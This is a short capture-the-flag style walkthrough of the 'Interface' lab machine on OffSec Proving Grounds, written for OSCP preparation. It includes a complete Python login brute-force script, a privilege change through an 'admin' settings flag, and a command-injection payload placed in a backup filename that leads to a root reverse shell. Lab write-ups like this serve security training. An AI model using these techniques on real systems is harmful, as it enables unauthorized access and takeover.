Home Iterface Easy box on OffSec Proving Grounds - OSCP Preparation.
Post
Cancel

Iterface Easy box on OffSec Proving Grounds - OSCP Preparation.

By bing0o
Posted 2022-01-21 Updated 2022-04-11 1 min read

Hello,

We are going to exploit one of OffSec Proving Grounds Medium machines which called Interface and this post is not a fully detailed walkthrough, I will just go through the important points during the exploit process.

Enumeration:

  • Nmap: image

  • port 80 is running a node.js app

  • We can get the full list of users from: http://interface.pg/api/users.

  • Running ffuf on http://interface.pg/api/ gives us some other endpoints:
    • /backup , Status code: 401
    • /settings, Status code: 401
  • bruteforce the login page with this script (you can use hydra or other tools for that!):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

#!/usr/bin/env python

from concurrent.futures import ThreadPoolExecutor as executor
import requests,sys


headers = {"Content-Type": "application/json", "Host": "interface.pg"}


def printer(url):
	sys.stdout.write(url+"                                                                       \r")
	sys.stdout.flush()
	return True

#@snoop
def Login(USERNAME, PASSWORD):
	printer("Trying: "+USERNAME+":"+PASSWORD)
	data = {"username":"USERNAME", "password":"PASSWORD"}
	data['username'] = USERNAME
	data['password'] = PASSWORD
	req = requests.post("http://interface.pg/login", json=data, headers=headers)
	if req.status_code != 401:
		print(str(req.status_code)+" | Creds> "+USERNAME+":"+PASSWORD)
		print('\n')
		exit(0)


users = open('users.txt', 'r')
for user in users:
	USERNAME = user.strip('\n')
	passwds = open('/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt', 'r')
	with executor(max_workers=20) as exe:
		[exe.submit(Login, USERNAME, passwd.strip('\n')) for passwd in passwds]
  • We got a valid Credentials:
    • User: dev-acct
    • Pass: password

image

  • Now we can access /api/settings endpoint: image

  • if you take a look at the response from the picture above you will notice that "admin":false looks juicy, let’s try to get admin access: image

  • Now since we have admin privilege, we can access /api/backup endpoint.

Command Injection:

  • apparently the application takes a filename and create a backup, let’s try and exploit that:

    Checking the RCE with this payload: ; ping -c 3 MY_IP_ADDRESS;

image

  • I got the ping hits on my local machine which confirms the RCE: image

  • I used a bash reverse shell payload to get a shell as root:

image

Happy Hacking!

OSCP, Proving Grounds
oscp easy box PG easy box enumeration API rce linux
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

Hawat Easy box on Offensive Security Proving Grounds - OSCP Preparation.

Muddy Box on OffSec Proving Grounds - OSCP Preparation.

Comments powered by Disqus.